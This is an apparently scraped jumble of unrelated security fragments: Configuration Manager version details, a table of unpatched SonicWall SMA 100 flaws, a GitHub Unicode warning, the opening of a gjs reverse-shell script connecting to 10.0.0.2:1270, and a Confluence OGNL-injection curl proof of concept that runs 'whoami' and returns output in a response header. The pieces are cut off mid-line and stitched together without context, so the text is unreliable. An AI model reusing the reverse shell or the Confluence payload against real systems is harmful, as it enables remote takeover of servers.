- Endpoint Configuration Manager version: 2103
- Site version: 5.00.9049.1000
- Connected Cache version: 1.5.4.1512 (?)
- Site installed on Windows Server 2019 (10.0.17763.2366)
The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done using SMA 500v using firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.
Vector | Auth | Affected | Component | Vulnerability | Vector |
---|---|---|---|---|---|
Remote | Unauthenticated | 10.2.1.1-19sv | httpd | Stack-based buffer overflow | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Remote | Authenticated | Both | Multiple cgi | Command injection | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
Remote | Unauthenticated | 10.2.1.1-19sv | sonicfiles | File upload path traversal | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
Remote | Unauthenticated | Both | sonicfiles | CPU exhaustion | AV:N |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// gjs shell.js | |
const Gio = imports.gi.Gio; | |
const GLib = imports.gi.GLib; | |
try { | |
let connection = (new Gio.SocketClient()).connect_to_host("10.0.0.2:1270", null, null); | |
let output = connection.get_output_stream(); | |
let input = new Gio.DataInputStream({ base_stream: connection.get_input_stream() }); | |
The following curl proof of concept will exfiltrate an executed command on Confluence 7.18.0 and below. The command below executes whoami
and will store it in the X-Cmd-Response
HTTP header.
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/
Example:
albinolobster@ubuntu:~$ curl -v http://10.0.0.28:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.Script